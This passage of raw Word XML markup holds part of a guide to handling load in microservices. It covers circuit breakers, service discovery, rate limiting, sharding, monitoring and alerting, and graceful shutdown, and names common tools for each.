          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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ActiveMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send messages between services asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74617C6E" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> architectures where services communicate via events, reducing synchronous dependencies and improving overall throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF80D2" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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5. Circuit Breakers and Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DD1AE" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To prevent a single failing service from impacting others, circuit breakers allow services to degrade gracefully when they detect a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1CE70" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE96A71" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Use libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hystrix</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Resilience4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to implement circuit breakers in your microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A53D07" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Circuit breakers monitor the health of a service and "open" the circuit to stop requests from reaching a failing service, preventing cascading failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B23166C" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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6. Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20281F" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In dynamic environments, such as with Kubernetes or containerized environments, service instances can scale up or down. Service discovery ensures that services can find each other despite changes in their network locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AFDC8B" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC8B94" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consul</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Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enable dynamic service registration and discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F736063" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or client application queries the service registry to route requests to the appropriate service instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845BBF1" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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7. Rate Limiting and Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7647B755" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Rate limiting prevents overloading microservices by controlling the number of requests that can be made within a specific time period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38512D38" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D408235" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Implement rate-limiting in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway</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Service Mesh</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kong</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Istio</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECFDBF5" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Use libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bucket4j</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Resilience4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot for rate-limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17362265" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Define usage policies for consumers to ensure fair usage and to protect critical services from being overwhelmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D22EBF" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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8. Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245815C1" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sharding involves splitting large datasets across multiple databases or instances to distribute the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624741B6" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0D096" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Use database sharding techniques where data is partitioned based on certain keys (e.g., user ID, product ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343EF2CB" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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In NoSQL databases like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cassandra</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MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, data sharding is typically built-in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF52997" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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In relational databases, sharding can be done at the application level or through database clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71496982" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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9. Monitoring and Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861908C" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Constant monitoring allows you to track system load, bottlenecks, and performance issues in real-time, enabling proactive load handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F30920" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1E84B" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Implement monitoring using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</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ELK Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Elasticsearch, Logstash, Kibana) for tracking system metrics like response times, request rates, and error rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B294CA6" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Set up </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</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Datadog</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to notify when certain thresholds (e.g., high latency, error rate) are breached, allowing teams to take action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E807A" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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lastRenderedPageBreak/>
        <w:t>10. Graceful Shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43B20A" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Properly handling load during service shutdowns (due to scaling down or deployment) ensures that there’s no sudden disruption or dropped traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C123539" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190B4D4" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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 xml:space="preserve">Configure your microservices to drain traffic and complete any in-progress requests before shutting down, a process commonly referred to as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>graceful shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57762326" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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In Spring Boot, this can be achieved by configuring the shutdown timeout and ensuring that services complete their tasks before terminating.</w:t>
      </w:r>
    </w:p>
